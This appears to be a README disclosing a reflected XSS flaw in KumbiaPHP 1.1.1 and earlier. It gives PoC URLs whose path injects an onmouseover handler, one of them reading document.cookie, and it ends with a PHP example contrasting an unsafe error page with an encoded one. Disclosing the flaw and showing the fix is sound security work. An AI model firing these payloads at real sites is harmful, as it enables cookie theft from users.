jenaye/KumbiaPHP-

KumbiaPHP

KumbiaPHP 1.1.1

  • Description: Allows an attacker to inject arbitrary malicious HTML or JavaScript code into the user's web browser
  • Affected versions: All <= 1.1.1

Information

To make this PoC, I just installed KumbiaPHP with git clone, then I used Composer and ran it on WAMP Server.

  • Vulnerability type: Reflected Cross-Site Scripting (XSS)

POC

Make sure you are in development mode. To check, go to http://kumbiaphp/public/pages/kumbia/status/ and replace status with *; you will see the stack trace. Then replace * with a payload like this: /<a%20onmouseover="alert('got%20it')"/>jenaye/</a/>

Your URL will look like the following: http://kumbiaphp/public/pages/kumbia//%3Ca%20onmouseover=%22alert((document.cookie)%22/%3EGetAdminCookie/%3C/a/%3E/
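The fix for this kind of reflection, as an added example that is not part of the original README and is not KumbiaPHP's own code: a hypothetical error-page renderer shown in its vulnerable form next to a hardened one that encodes the path in development mode and reflects nothing in production. The function names, the page markup and the sample path are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical error-page renderer, NOT KumbiaPHP's code: it models a
// framework that names the unresolved request path on its error page.

/** Vulnerable form: the decoded path is concatenated into HTML as-is. */
function renderErrorUnsafe(string $path): string
{
    return "<h1>Page not found</h1><p>No action for: $path</p>";
}

/**
 * Hardened form: production mode reflects nothing; development mode
 * HTML-encodes the path (both quote styles included) before printing it.
 */
function renderErrorSafe(string $path, bool $production): string
{
    if ($production) {
        return '<h1>Page not found</h1>';
    }
    $encoded = htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<h1>Page not found</h1><p>No action for: $encoded</p>";
}

// Constructed input: the path payload shown on this page, percent-encoded
// the way a browser sends it and then decoded as the application sees it.
$path = rawurldecode(
    '/pages/kumbia/%3Ca%20onmouseover=%22alert(%27got%20it%27)%22/%3Ejenaye/%3C/a/%3E'
);

// Print the three variants so the markup can be compared side by side:
// the first contains a live <a> element with an event handler, the second
// carries the same characters as inert entities, the third echoes no input.
echo "unsafe:      ", renderErrorUnsafe($path), PHP_EOL;
echo "development: ", renderErrorSafe($path, false), PHP_EOL;
echo "production:  ", renderErrorSafe($path, true), PHP_EOL;
```

Run it with the PHP CLI and compare the first two lines: the hardened output contains no element the browser would parse from the reflected path.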
